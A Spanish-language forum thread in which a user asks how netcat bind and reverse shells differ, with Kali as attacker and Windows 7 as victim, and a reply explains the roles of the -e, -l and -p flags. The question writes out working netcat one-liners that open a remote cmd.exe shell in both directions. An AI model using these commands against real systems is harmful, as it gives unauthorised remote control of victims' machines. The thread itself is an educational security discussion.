|
Título: netcat, duda con el tipo de conexiones Publicado por: retr02332 en 16 Agosto 2020, 07:21 am Hola a todos.
Tengo una cierta duda con las bind y reverse shell. (suponiendo kali como atacante y windows 7 como victima) Conexion directa windows 7: nc -lvvp 1234 -e cmd.exe Kali: nc [IP-windows 7] 1234 Conexion reversa Kali: nc -lvvp 1234 windows 7: nc [IP] 1234 -e cmd.exe ################################################### Mis dudas son las siguientes: pregunta 1.¿una conexion directa de windows a kali, es equivalente a una reversa siendo kali el puerto a la escucha? Se que una conexion reversa es mejor a una directa por muchas cosas como evitar ser filtrado por el firewall, un cambio de ip inesperado por parte del NAT (o hasta del puerto, etc). Teniendo eso claro, entonces... si windows se conecta a kali de forma directa, a la maquina windows 7... pregunta 2. ¿tambien presentaria problemas al intentar conectarse conmigo por cosas como mi firewall y asi? pregunta 3. ¿Asi que la diferencia entre ambos tipos de conexiones radica en quien tiene la bandera "-e shell"?. ¿Es esa entonces la diferencia entre ambos tipos de conexiones?, ¿sobre quien tiene el modificador "-e"? Muchas gracias Título: Re: netcat, duda con el tipo de conexiones Publicado por: WHK en 20 Agosto 2020, 07:13 am Hola, en tus primeras dos preguntas estás en lo correcto, pero no en la tercera. El flag "-e" siempre se ejecuta del lado del sistema que se desea controlar, independientemente que sea a traves de una conexión directa o inversa.
La diferencia radica en quien escucha y quen conecta y esa opción es "-l" (listen) y "-p" (puerto a escuchar). Las dos "vv" es para verbose, lo puedes usar tanto en el cliente como en el servidor. Saludos. |